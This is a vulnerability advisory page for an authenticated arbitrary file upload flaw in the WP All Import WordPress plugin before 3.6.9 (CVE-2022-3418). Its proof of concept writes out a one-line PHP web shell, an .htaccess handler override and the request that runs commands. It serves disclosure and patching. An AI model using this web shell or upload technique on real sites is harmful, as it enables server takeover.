WordPress Plugin Vulnerabilities

WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE

Description

The plugin is not properly filtering which file extensions are allowed to be imported on the server, which could allow administrators in multi-site WordPress installations to upload arbitrary files

Proof of Concept

[1] Create 'poc.zip' with 2 files like below

 [1-1] 'exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands.
* fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string from the server response.

Affects Plugins

Plugin icon
wp-all-import
Fixed in 3.6.9

References

CVE
CVE-2022-3418

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
5.9 (medium)

Miscellaneous

Original Researcher
lucy
Submitter
lucy
Verified
Yes
WPVDB ID
ccbb74f5-1b8f-4ea6-96bc-ddf62af7f94d

Timeline

Publicly Published
2022-10-14 (about 1 years ago)
Added
2022-10-15 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)

Other

Published
Title
Published
2024-03-13
Title
WP Fusion Lite < 3.42.10 - Authenticated (Contributor+) Remote Code Execution
Published
2016-09-26
Title
W3 Total Cache < 0.9.5 – Authenticated Arbitrary PHP Code Execution
Published
2024-04-05
Title
Advanced Order Export For WooCommerce < 3.4.5 - Shop Manager+ Remote Code Execution
Published
2014-08-01
Title
Is-human <= 1.4.2 - Remote Comm& Execution
Published
2024-02-14
Title
Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution